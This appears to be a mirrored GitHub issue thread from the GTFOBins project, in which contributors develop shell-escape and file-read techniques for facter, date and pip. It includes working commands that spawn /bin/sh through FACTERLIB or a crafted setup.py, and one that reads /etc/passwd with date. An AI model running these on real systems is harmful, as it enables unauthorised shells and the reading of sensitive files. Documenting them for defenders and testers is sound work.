Comments (10)
Thanks AlessandroZ, that's a great contribution, I'll work on this next days.
from gtfobins.github.io.
Did you try the facter
payload? My version uses a slightly different syntax i.e. uses --external-dir
but I get no command execution.
$ cat x2
Facter.add(x) do
setcode do
Facter::Core::Execution.execute('/usr/bin/id > /tmp/output')
Facter::Util::Resolution.exec('/usr/bin/id > /tmp/output')
end
end
$ facter --external-dir=.
Fact file ./x2 was parsed but returned an empty data set
...
$ cat /tmp/output
cat: /tmp/output: No such file or directory
Since it's Ruby I also tried some generic ruby command execution statement, with no luck so far.
from gtfobins.github.io.
Hi,
No in fact, I haven't tested it before. I do not have custom-dir
as well but it should be alse done using the environment variable FACTERLIB. I have just done some test but without success.
I agree, it's weird, in lot of examples, they launch system command.
from gtfobins.github.io.
OK the problem was that directories must be absolute paths.
Also apparently there are two kind of facts:
- custom facts (that uses
FACTERLIB
) are Ruby files; - external facts (that uses
external-dir
) are any shebanged executable file.
The nice thing about the former is that the Ruby code is executed within the main ruby process so with an exec we can replace it with a proper interactive shell.
Here's how:
TF=$(mktemp --tmpdir XXXXXXXXXX.rb)
echo 'exec("/bin/sh")' > $TF
FACTERLIB=/tmp/ facter
I'm going to add the binary.
from gtfobins.github.io.
Awesome, nice work. π
from gtfobins.github.io.
I have seen this one too:
date -f /etc/passwd
from gtfobins.github.io.
pip as well using a custom repo:
pip install custom_repo
Like these repos (or another custom one):
from gtfobins.github.io.
Thanks @AlessandroZ, let's see if GitHub can help us keeping track of this:
from gtfobins.github.io.
Here's the pip
version, it's just execute-interactive
, I'm not sure if we should add all the other functions since it's basically Python.
TF=$(mktemp -d)
echo 'import os; os.dup2(0, 1); os.dup2(0, 2); os.execl("/bin/sh", "sh")' > $TF/setup.py
pip install $TF
from gtfobins.github.io.
It's perfect like that. Thanks for your work. π
from gtfobins.github.io.
Related Issues (20)
- Node Shell is not working HOT 1
- [dpkg] priv esc HOT 3
- Any script to run through all the escalations and see if they βworkβ? HOT 2
- ispell / contributing HOT 1
- Hello -> SUID for usr/bin/screen HOT 2
- bundle command missing, is alias for bundler?
- How to add examples? HOT 1
- Fix for sudo from NPM binary HOT 1
- How to use File read escalation HOT 4
- ruby CAP_CHOWN capability HOT 1
- The SUID authorization command of the rsync command is incorrect; Missing - p parameter HOT 5
- Wget SUDO old version HOT 1
- Additional wireshark trick HOT 1
- Add privilege escalation technique using LXD/LXC HOT 2
- genisoimage file read HOT 1
- Proposal: Limited File Write Category
- Proposal: Expand Capabilities to other exploitable types eg CAP_CHOWN, CAP_SYS_PTRACE
- Recent Commit Accidentally Removes Bash Methods HOT 1
- Proposal: Expand Sudo technique root HOT 1
- Add another file read to genisoimage
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
π Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. πππ
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google β€οΈ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from gtfobins.github.io.